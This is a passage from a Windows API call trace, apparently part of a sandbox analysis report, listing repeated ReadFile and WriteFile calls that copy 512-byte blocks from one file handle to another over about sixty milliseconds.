lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.963] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.963] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.964] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.964] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.965] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.965] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.966] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.966] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.967] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.968] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.969] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.969] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.970] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.970] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.971] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.971] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.972] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.972] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.973] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.973] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.974] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.974] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.975] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.975] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.976] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.976] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.977] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.977] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.977] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.978] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.978] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.979] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.979] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.980] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.980] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.981] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.981] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.982] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.982] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.983] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.983] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.984] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.984] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.985] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.985] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.986] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.986] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.987] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.987] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.988] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.988] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.989] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.989] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.990] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.990] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.991] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.991] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.992] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.992] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.993] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.993] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.994] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.994] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.995] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.995] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.996] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.996] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.997] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.997] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.997] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.998] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.008] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.008] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.009] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.009] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.010] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.010] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.011] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.011] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.012] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.012] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.013] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.013] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.014] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.015] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.015] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.016] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.016] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.017] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.017] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.017] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.018] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.018] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.019] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.019] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.020] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.020] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.021] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.021] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.022] ReadFile (in: hFile=0x2b0, 